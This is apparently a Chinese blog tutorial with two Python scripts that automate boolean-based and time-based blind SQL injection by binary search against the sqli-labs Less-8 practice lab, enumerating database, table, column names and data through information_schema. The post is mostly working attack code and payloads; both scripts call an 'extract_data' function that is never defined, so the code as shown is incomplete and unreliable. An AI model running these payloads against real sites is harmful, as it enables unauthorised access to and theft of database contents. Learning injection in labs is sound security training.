利用二分法+布尔盲注、时间盲注进行sql注入

Ajiang4212025-02-14 21:11

一、布尔盲注:

python 复制代码 
import requests
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
        res = {"id": payload}
        r = requests.get(url, params=res)
 
        if "You are in.........." in r.text:
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
    print(f"数据库名: {database_name}")
    print(f"表名: {table_names}")
    print(f"列名: {column_names}")
    print(f"数据: {extracted_values}")

二、时间盲注:

python 复制代码 
import requests
import time
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        res = {"id": payload}
        
        start_time = time.time()
        r = requests.get(url, params=res)
        response_time = time.time() - start_time
        
        if response_time > 1.5:  # 服务器延迟意味着条件成立
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
相关推荐
草莓熊Lotso12 小时前
Git 分支管理:从基础操作到协作流程(本地篇)
大数据·服务器·开发语言·c++·人工智能·git·sql
q***333715 小时前
oracle 12c查看执行过的sql及当前正在执行的sql
java·sql·oracle
7***998717 小时前
GaussDB数据库中SQL诊断解析之配置SQL限流
数据库·sql·gaussdb
5***o50019 小时前
PHP在电商中的支付集成
sql·ue5·rizomuv
6***B481 天前
存储过程(SQL)
android·数据库·sql
t***31651 天前
Docker 之mysql从头开始——Docker下mysql安装、启动、配置、进入容器执行(查询)sql
sql·mysql·docker
合作小小程序员小小店1 天前
桌面开发,超市管理系统开发,基于C#,winform,sql server数据库
开发语言·数据库·sql·microsoft·sqlserver·c#
N***73851 天前
SQL锁机制
java·数据库·sql
cookqq1 天前
mongodb根据索引IXSCAN 查询记录流程
数据结构·数据库·sql·mongodb·nosql
6***v4171 天前
spring boot 项目打印sql日志和结果,使用logback或配置文件
spring boot·sql·logback
热门推荐
01GitHub 镜像站点02【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连03BongoCat - 跨平台键盘猫动画工具04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07Labelme从安装到标注:零基础完整指南08Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南09全球最强模型Grok4,国内已可免费使用!(附教程)10Gemini 3.0 Pro Preview 实测报告